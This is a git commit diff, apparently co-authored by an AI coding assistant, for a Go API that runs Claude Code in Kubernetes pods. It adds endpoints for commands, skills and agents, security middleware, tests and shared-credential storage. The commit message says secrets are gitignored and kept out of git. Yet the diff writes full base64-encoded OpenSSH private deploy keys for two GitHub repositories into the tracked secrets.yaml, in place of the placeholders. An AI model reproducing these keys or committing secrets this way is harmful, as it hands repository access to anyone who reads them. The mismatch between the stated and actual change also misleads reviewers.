feat: Add claude-config API, security hardening, and testing infrastructure

Claude Config API (v0.6):
- Add CRUD endpoints for commands, skills, and agents
- Commands/skills/agents stored in /workspace/.claude/ (per-project, in git)
- Credentials shared via PVC at /root/.claude/ (shared across pods)
- Use base64 encoding for file writes (prevents shell injection)
- Add content size limits (1MB max)

Security Hardening:
- Add sanitize package for command/prompt validation
- Add rate limiting middleware (token bucket algorithm)
- Add concurrent command limiting
- Add input sanitization to all command handlers
- Gitignore secrets.yaml and credentials.yaml
- Add *.example templates for secrets

Testing Infrastructure:
- Add testutil package with mocks and fixtures
- Add unit tests for auth package (63% coverage)
- Add unit tests for executor (47% coverage)
- Add handler integration tests (40% coverage)
- Add 100% coverage for sanitize, cmdlimit packages
- Add 96% coverage for ratelimit package

Infrastructure:
- Shared Claude credentials PVC (ReadWriteMany)
- Reduced workspace PVC size from 20Gi to 5Gi
- Add init container cleanup before git clone
- Document Longhorn RWX requirements

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
jordan 2026-01-25 01:29:13 -07:00
parent 74643f0692
commit 538ea57ed4
48 changed files with 6066 additions and 57 deletions

4
.gitignore vendored
View File

@ -4,6 +4,10 @@
*.key
*.pem
# Kubernetes secrets with real values (use *.example as template)
deployments/k8s/base/secrets.yaml
deployments/k8s/base/credentials.yaml
# Local development
.env.local

View File

@ -16,8 +16,8 @@ RUN go mod download
# Copy source code
COPY . .
# Build the binary
RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api
# Build the binary (platform determined by Docker --platform flag)
RUN CGO_ENABLED=0 go build -ldflags="-s -w" -o rdev-api ./cmd/rdev-api
# Runtime stage
FROM alpine:3.19

View File

@ -9,7 +9,7 @@ Run Claude Code in isolated Kubernetes pods on your k3s cluster.
export KUBECONFIG=~/.kube/orchard9-k3sf.yaml
# 2. Authenticate Claude locally (if not already)
claude login
claude
# 3. Create credentials secret
./scripts/create-credentials-secret.sh

View File

@ -24,6 +24,13 @@
// - POST /projects/{id}/shell - Run shell command
// - POST /projects/{id}/git - Run git command
// - GET /projects/{id}/events - SSE stream for output
// - GET /projects/{id}/claude-config - List commands/skills/agents
// - GET /projects/{id}/claude-config/commands - List commands
// - POST /projects/{id}/claude-config/commands - Create command
// - GET /projects/{id}/claude-config/commands/{name} - Get command
// - PUT /projects/{id}/claude-config/commands/{name} - Update command
// - DELETE /projects/{id}/claude-config/commands/{name} - Delete command
// (same pattern for /skills and /agents)
package main
import (
@ -76,10 +83,15 @@ func main() {
// Initialize handlers
projectsHandler := handlers.NewProjectsHandler()
keysHandler := handlers.NewKeysHandler(authService)
claudeConfigHandler := handlers.NewClaudeConfigHandler(
projectsHandler.Registry(),
projectsHandler.Executor(),
)
// Register routes
projectsHandler.Mount(app.Router())
keysHandler.Mount(app.Router())
claudeConfigHandler.Mount(app.Router())
// Enable API documentation
app.EnableDocs(buildOpenAPISpec())
@ -194,6 +206,7 @@ Command output is streamed via Server-Sent Events (SSE) at /projects/{id}/events
spec.WithTag("Projects", "Project management and discovery")
spec.WithTag("Commands", "Command execution (claude, shell, git)")
spec.WithTag("Events", "Server-Sent Events for real-time output")
spec.WithTag("Claude Config", "Manage commands, skills, and agents in /workspace/.claude/")
spec.WithTag("System", "Health and readiness endpoints")
// System endpoints
@ -421,6 +434,194 @@ events.addEventListener('complete', (e) => {
},
})
// Claude Config - Overview
spec.AddPath("/projects/{id}/claude-config", "get", withAuthAndParams(
"Get config overview",
`Returns an overview of the project's Claude config (/workspace/.claude/).
Lists available commands, skills, and agents. Requires projects:read scope.`,
"Claude Config",
"projects:read",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
))
// Claude Config - Commands
spec.AddPath("/projects/{id}/claude-config/commands", "get", withAuthAndParams(
"List commands",
"Lists all custom commands in /workspace/.claude/commands/. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
))
spec.AddPath("/projects/{id}/claude-config/commands", "post", withAuthBodyAndParams(
"Create command",
`Creates a new custom command in /workspace/.claude/commands/{name}.md.
Commands are markdown files with frontmatter. Requires projects:execute scope.`,
"Claude Config",
"projects:execute",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
`{
"name": "deploy",
"content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..."
}`,
`{
"name": "deploy",
"type": "commands",
"content": "---\ndescription: Deploy to production\n---\n\nRun the deployment..."
}`,
))
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "get", withAuthAndParams(
"Get command",
"Returns a specific command's content. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Command name", Required: true},
},
))
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "put", withAuthBodyAndParams(
"Update command",
"Updates a command's content. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Command name", Required: true},
},
`{
"content": "---\ndescription: Updated description\n---\n\nUpdated content..."
}`,
`{
"name": "deploy",
"type": "commands",
"content": "---\ndescription: Updated description\n---\n\nUpdated content..."
}`,
))
spec.AddPath("/projects/{id}/claude-config/commands/{name}", "delete", withAuthAndParams(
"Delete command",
"Deletes a command. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Command name", Required: true},
},
))
// Claude Config - Skills (same pattern as commands)
spec.AddPath("/projects/{id}/claude-config/skills", "get", withAuthAndParams(
"List skills",
"Lists all skills in /workspace/.claude/skills/. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
))
spec.AddPath("/projects/{id}/claude-config/skills", "post", withAuthBodyAndParams(
"Create skill",
"Creates a new skill. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
`{"name": "go-testing", "content": "# Go Testing Skill\n\n..."}`,
`{"name": "go-testing", "type": "skills", "content": "# Go Testing Skill\n\n..."}`,
))
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "get", withAuthAndParams(
"Get skill",
"Returns a specific skill's content. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Skill name", Required: true},
},
))
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "put", withAuthBodyAndParams(
"Update skill",
"Updates a skill's content. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Skill name", Required: true},
},
`{"content": "# Updated Skill\n\n..."}`,
`{"name": "go-testing", "type": "skills", "content": "# Updated Skill\n\n..."}`,
))
spec.AddPath("/projects/{id}/claude-config/skills/{name}", "delete", withAuthAndParams(
"Delete skill",
"Deletes a skill. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Skill name", Required: true},
},
))
// Claude Config - Agents (same pattern)
spec.AddPath("/projects/{id}/claude-config/agents", "get", withAuthAndParams(
"List agents",
"Lists all agents in /workspace/.claude/agents/. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
))
spec.AddPath("/projects/{id}/claude-config/agents", "post", withAuthBodyAndParams(
"Create agent",
"Creates a new agent. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{{Name: "id", In: "path", Description: "Project ID", Required: true}},
`{"name": "code-reviewer", "content": "# Code Reviewer Agent\n\n..."}`,
`{"name": "code-reviewer", "type": "agents", "content": "# Code Reviewer Agent\n\n..."}`,
))
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "get", withAuthAndParams(
"Get agent",
"Returns a specific agent's content. Requires projects:read scope.",
"Claude Config",
"projects:read",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Agent name", Required: true},
},
))
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "put", withAuthBodyAndParams(
"Update agent",
"Updates an agent's content. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Agent name", Required: true},
},
`{"content": "# Updated Agent\n\n..."}`,
`{"name": "code-reviewer", "type": "agents", "content": "# Updated Agent\n\n..."}`,
))
spec.AddPath("/projects/{id}/claude-config/agents/{name}", "delete", withAuthAndParams(
"Delete agent",
"Deletes an agent. Requires projects:execute scope.",
"Claude Config",
"projects:execute",
[]param{
{Name: "id", In: "path", Description: "Project ID", Required: true},
{Name: "name", In: "path", Description: "Agent name", Required: true},
},
))
return spec
}

View File

@ -1,5 +1,5 @@
# claudebox-aeries - Claude Code pod for the Aeries project
# v0.2 - Real workspace with init container repo clone
# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace
apiVersion: apps/v1
kind: StatefulSet
@ -44,6 +44,8 @@ spec:
# Clone or fetch
if [ ! -d /workspace/.git ]; then
echo "Cloning aeries repository..."
# Remove any existing files (e.g., lost+found from filesystem)
rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true
git clone git@github.com:orchard9/aeries.git /workspace
echo "Clone complete."
else
@ -121,7 +123,7 @@ spec:
- name: claude-config
persistentVolumeClaim:
claimName: claudebox-aeries-claude-config
claimName: claudebox-shared-claude-config
- name: ssh-keys
secret:

View File

@ -1,5 +1,5 @@
# claudebox-pantheon - Claude Code pod for the Pantheon project
# v0.2 - Real workspace with init container repo clone
# v0.6 - Shared credentials, project-specific commands/skills/agents in workspace
apiVersion: apps/v1
kind: StatefulSet
@ -44,6 +44,8 @@ spec:
# Clone or fetch
if [ ! -d /workspace/.git ]; then
echo "Cloning pantheon repository..."
# Remove any existing files (e.g., lost+found from filesystem)
rm -rf /workspace/* /workspace/.[!.]* 2>/dev/null || true
git clone git@github.com:orchard9/pantheon.git /workspace
echo "Clone complete."
else
@ -121,7 +123,7 @@ spec:
- name: claude-config
persistentVolumeClaim:
claimName: claudebox-pantheon-claude-config
claimName: claudebox-shared-claude-config
- name: ssh-keys
secret:

View File

@ -0,0 +1,24 @@
# rdev-credentials - API authentication and database credentials
# Copy this to credentials.yaml and replace with real values
#
# IMPORTANT: credentials.yaml should NOT be committed to git!
#
# Generate admin key:
# openssl rand -base64 32
apiVersion: v1
kind: Secret
metadata:
name: rdev-credentials
namespace: rdev
labels:
app.kubernetes.io/name: rdev-api
app.kubernetes.io/part-of: rdev
type: Opaque
stringData:
# Database password (uses existing postgres appuser)
DB_PASSWORD: "REPLACE_WITH_DB_PASSWORD"
# Admin API key for rdev-api
# Generate with: openssl rand -base64 32
RDEV_ADMIN_KEY: "REPLACE_WITH_ADMIN_KEY"

View File

@ -13,13 +13,18 @@ resources:
# v0.2 - Project-specific claudeboxes
- pvc-pantheon.yaml
- pvc-aeries.yaml
# v0.6 - Shared Claude credentials (auth only)
- pvc-shared-claude.yaml
- configmaps.yaml
- secrets.yaml
# NOTE: secrets.yaml and credentials.yaml contain real keys and are gitignored.
# Copy from *.example files and fill in real values before deploying.
- secrets.yaml # from secrets.yaml.example
- credentials.yaml # from credentials.yaml.example
- claudebox-pantheon.yaml
- claudebox-aeries.yaml
# v0.4 - API Server
- rbac.yaml
# v0.4+ - API Server (RBAC now included in rdev-api.yaml)
- rdev-api.yaml
commonLabels:

View File

@ -1,5 +1,5 @@
# PVCs for claudebox-aeries
# v0.2 - Real workspace storage
# v0.6 - Workspace only (claude-config is now shared)
apiVersion: v1
kind: PersistentVolumeClaim
@ -16,21 +16,4 @@ spec:
storageClassName: longhorn
resources:
requests:
storage: 20Gi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: claudebox-aeries-claude-config
namespace: rdev
labels:
app.kubernetes.io/name: claudebox-aeries
app.kubernetes.io/part-of: rdev
rdev.orchard9.ai/project: aeries
spec:
accessModes:
- ReadWriteOnce
storageClassName: longhorn
resources:
requests:
storage: 1Gi
storage: 5Gi

View File

@ -1,5 +1,5 @@
# PVCs for claudebox-pantheon
# v0.2 - Real workspace storage
# v0.6 - Workspace only (claude-config is now shared)
apiVersion: v1
kind: PersistentVolumeClaim
@ -16,21 +16,4 @@ spec:
storageClassName: longhorn
resources:
requests:
storage: 20Gi
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: claudebox-pantheon-claude-config
namespace: rdev
labels:
app.kubernetes.io/name: claudebox-pantheon
app.kubernetes.io/part-of: rdev
rdev.orchard9.ai/project: pantheon
spec:
accessModes:
- ReadWriteOnce
storageClassName: longhorn
resources:
requests:
storage: 1Gi
storage: 5Gi

View File

@ -0,0 +1,29 @@
# Shared Claude credentials PVC
# v0.6 - All claudebox pods share this for auth
# Commands/skills/agents live in /workspace/.claude (per-project, in git)
#
# IMPORTANT: ReadWriteMany (RWX) requires Longhorn with NFS enabled.
# Verify with: kubectl get settings -n longhorn-system rwx-volume-fast-failover
# If RWX is not available, either:
# 1. Enable Longhorn NFS: kubectl apply -f longhorn-nfs-provisioner.yaml
# 2. Or use separate PVCs per pod (revert to per-project claude-config PVCs)
#
# RWX is needed because multiple claudebox pods mount this simultaneously
# to share Claude authentication credentials.
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: claudebox-shared-claude-config
namespace: rdev
labels:
app.kubernetes.io/name: claudebox
app.kubernetes.io/part-of: rdev
rdev.orchard9.ai/type: shared-config
spec:
accessModes:
- ReadWriteMany # Multiple pods can mount simultaneously
storageClassName: longhorn
resources:
requests:
storage: 1Gi

View File

@ -24,10 +24,9 @@ data:
# Replace with base64-encoded private key
# Generate with: ssh-keygen -t ed25519 -f pantheon-deploy-key -N ""
# Encode with: cat pantheon-deploy-key | base64 -w0
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNDU29NQkZpRWg5akZQNnpUWWlJaUpkMUdzRjRxM29oN2lBZ1JRUkNYYTdKQUFBQUtDMkNXck90Z2xxCnpnQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQ1NvTUJGaUVoOWpGUDZ6VFlpSWlKZDFHc0Y0cTNvaDdpQWdSUVJDWGE3SkEKQUFBRUNyc08zSDNoQ2tQQ0I1V0VRTFdDZ0QyOGlrNGN3dk5oalVjVGwzVGNqVkRKS2d3RVdJU0gyTVUvck5OaUlpSWwzVQphd1hpcmVpSHVJQ0JGQkVKZHJza0FBQUFHWEprWlhZdGNHRnVkR2hsYjI1QWIzSmphR0Z5WkRrdVlXa0JBZ01FCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
# GitHub's SSH host key (pre-populated)
# ssh-keyscan github.com 2>/dev/null | base64 -w0
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
---
apiVersion: v1
@ -41,10 +40,7 @@ metadata:
rdev.orchard9.ai/project: aeries
type: Opaque
data:
# Replace with base64-encoded private key
# Generate with: ssh-keygen -t ed25519 -f aeries-deploy-key -N ""
# Encode with: cat aeries-deploy-key | base64 -w0
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
id_ed25519: LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFNd0FBQUF0emMyZ3RaVwpReU5UVXhPUUFBQUNBNWZzME9Cb0JWWTN3dmI2K256WngzRDltV3MrQVdKRHBIVjVaK3pCQmdyd0FBQUtDY05ERE1uRFF3CnpBQUFBQXR6YzJndFpXUXlOVFV4T1FBQUFDQTVmczBPQm9CVlkzd3ZiNituelp4M0Q5bVdzK0FXSkRwSFY1Wit6QkJncncKQUFBRUFnTU5PVDl3RlBHYnY3bTdYS1dTODVrVHYyZlhiSzgrdnR4NjQ1c2RqNmp6bCt6UTRHZ0ZWamZDOXZyNmZObkhjUAoyWmF6NEJZa09rZFhsbjdNRUdDdkFBQUFGM0prWlhZdFlXVnlhV1Z6UUc5eVkyaGhjbVE1TG1GcEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=
# GitHub's SSH host key (pre-populated)
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K

View File

@ -0,0 +1,46 @@
# Deploy Keys for claudebox pods
# Copy this to secrets.yaml and replace with real keys
#
# IMPORTANT: secrets.yaml should NOT be committed to git!
#
# Generate keys:
# ssh-keygen -t ed25519 -f pantheon-deploy-key -N "" -C "rdev-pantheon@orchard9.ai"
# ssh-keygen -t ed25519 -f aeries-deploy-key -N "" -C "rdev-aeries@orchard9.ai"
#
# Encode keys:
# cat pantheon-deploy-key | base64 -w0
# cat aeries-deploy-key | base64 -w0
apiVersion: v1
kind: Secret
metadata:
name: claudebox-pantheon-ssh
namespace: rdev
labels:
app.kubernetes.io/name: claudebox-pantheon
app.kubernetes.io/part-of: rdev
rdev.orchard9.ai/project: pantheon
type: Opaque
data:
# Replace with base64-encoded private key
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
# GitHub's SSH host key (pre-populated)
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K
---
apiVersion: v1
kind: Secret
metadata:
name: claudebox-aeries-ssh
namespace: rdev
labels:
app.kubernetes.io/name: claudebox-aeries
app.kubernetes.io/part-of: rdev
rdev.orchard9.ai/project: aeries
type: Opaque
data:
# Replace with base64-encoded private key
id_ed25519: REPLACE_WITH_BASE64_ENCODED_PRIVATE_KEY
# GitHub's SSH host key (pre-populated)
known_hosts: Z2l0aHViLmNvbSBzc2gtZWQyNTUxOSBBQUFBQzNOemFDMWxaREkxTlRFNUFBQUFJT01xcW5rVnpybTBTZEc2VU9vcUtMc2FiZ0g1Qzlva1dpMGRoMmw5R0tKbApnaXRodWIuY29tIGVjZHNhLXNoYTItbmlzdHAyNTYgQUFBQUUyVmpaSE5oTFhOb1lUSXRibWx6ZEhBeU5UWUFBQUFJYm1semRIQXlOVFlBQUFCQkJFbUtTRU5qUUVlek9teGtaTXk3b3BLZ3dGQjlua3Q1WVJyWU1qTnVHNU44N3VSUW81dDRRYkZGelVaYUpVQjd4TmtjYVFTNmlIbW5TazdNOU9tZUR2PT0KZ2l0aHViLmNvbSBzc2gtcnNhIEFBQUFCM056YUMxeWMyRUFBQUFEQVFBQkFBQUJnUUNqN25kTnhRb3dnY1FuanNoY0xycVBFaWlwaG50K1ZUVHZEUCtsSFhaZFhMRThWVUxDS0lLYjloZk5qM0FXSm1RTHBDb0Qzc1F2TWtGNUxXR1RMSFRVM25MSjViZi8wbG5wOGV5ZXhVNkpzR1dSUUFLTnlENjkzQjVVR2xXVlM1VjFqUEg1M3BZVllWUVB6WnlkeGpPUVFLeHk5ZkdoaVFGbGcza3RoZFdSRE5oNy9SRHp4SEZEZmRYYm5uSnZ4WVQ0Y1FVWWJ0SmFTQ0pWcU9aOVlUbG13bTJBUXZaM3IxZEJkZzVRcWN1SW53bzR1NXBhQUpObnpiTXBudGtzVXpWNEorUFN5OE9LSzRPc0tUc0I0RlNjS0VOSmRlMTlYTGFCUHJiNTZpUHhCS0tSMGJNK2NPdnhKelhhZWJORktjR2k4eVJLaGw0T0hlYkhCWDh4eFpZNWMwdWdpcTlSb29QaUtPelJERE1lekdhK0c4MDg1OVF2TkdPK3pZM3RNeHJIM1crT21uYU5keVN6dkpPUktjZEEwejNGU1huUk5jbnZpVlg0c3lGaWdhOUxGZjZ0ZDBhRy8xUFEwVjRCYzFQNXNHdTZBQUFBZUg0em5YNStNNTErUUpWZGorR2NMdTMwcE91U0E1cVZOQ0FodXl6RklBWWlhbjBFWUlnUlE3TmxYdz0K

166
docs/claude-config-api.md Normal file
View File

@ -0,0 +1,166 @@
# Claude Config API
Manage Claude Code commands, skills, and agents via the rdev API.
## Architecture
```
/root/.claude/ # Shared PVC (all projects)
├── .credentials.json # Auth tokens (shared)
└── settings.json # Global preferences
/workspace/.claude/ # In git repo (per-project)
├── commands/ # Project slash commands
│ └── deploy.md
├── skills/ # Project skills
│ └── go-testing.md
└── agents/ # Project agents
└── code-reviewer.md
```
## Authentication
All endpoints require `Authorization: Bearer <api-key>` header.
- `projects:read` scope for GET endpoints
- `projects:execute` scope for POST/PUT/DELETE endpoints
## Endpoints
### Overview
```
GET /projects/{id}/claude-config
```
Returns counts and lists of available commands, skills, and agents.
**Response:**
```json
{
"data": {
"project": "pantheon",
"path": "/workspace/.claude",
"commands": ["deploy", "test"],
"skills": ["go-testing"],
"agents": ["code-reviewer"]
}
}
```
### Commands
```
GET /projects/{id}/claude-config/commands # List all
POST /projects/{id}/claude-config/commands # Create
GET /projects/{id}/claude-config/commands/{name} # Get one
PUT /projects/{id}/claude-config/commands/{name} # Update
DELETE /projects/{id}/claude-config/commands/{name} # Delete
```
### Skills
```
GET /projects/{id}/claude-config/skills # List all
POST /projects/{id}/claude-config/skills # Create
GET /projects/{id}/claude-config/skills/{name} # Get one
PUT /projects/{id}/claude-config/skills/{name} # Update
DELETE /projects/{id}/claude-config/skills/{name} # Delete
```
### Agents
```
GET /projects/{id}/claude-config/agents # List all
POST /projects/{id}/claude-config/agents # Create
GET /projects/{id}/claude-config/agents/{name} # Get one
PUT /projects/{id}/claude-config/agents/{name} # Update
DELETE /projects/{id}/claude-config/agents/{name} # Delete
```
## Examples
### Create a command
```bash
curl -X POST http://localhost:8080/projects/pantheon/claude-config/commands \
-H "Authorization: Bearer $RDEV_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"name": "deploy",
"content": "---\ndescription: Deploy to production\n---\n\n1. Run tests\n2. Build image\n3. Deploy to k8s"
}'
```
### List commands
```bash
curl http://localhost:8080/projects/pantheon/claude-config/commands \
-H "Authorization: Bearer $RDEV_API_KEY"
```
### Get a specific command
```bash
curl http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
-H "Authorization: Bearer $RDEV_API_KEY"
```
### Update a command
```bash
curl -X PUT http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
-H "Authorization: Bearer $RDEV_API_KEY" \
-H "Content-Type: application/json" \
-d '{
"content": "---\ndescription: Deploy to production (updated)\n---\n\nNew steps..."
}'
```
### Delete a command
```bash
curl -X DELETE http://localhost:8080/projects/pantheon/claude-config/commands/deploy \
-H "Authorization: Bearer $RDEV_API_KEY"
```
## File Format
Commands, skills, and agents are markdown files with optional YAML frontmatter:
```markdown
---
description: Short description shown in /help
---
# Full instructions
Detailed instructions for Claude...
```
## Git Integration
Since files are stored in `/workspace/.claude/`, you can commit them to git:
```bash
# Via API
POST /projects/pantheon/git
{"args": ["add", ".claude/"]}
POST /projects/pantheon/git
{"args": ["commit", "-m", "Add deploy command"]}
POST /projects/pantheon/git
{"args": ["push"]}
```
## Shared Credentials
Claude auth is stored on a shared PVC (`claudebox-shared-claude-config`).
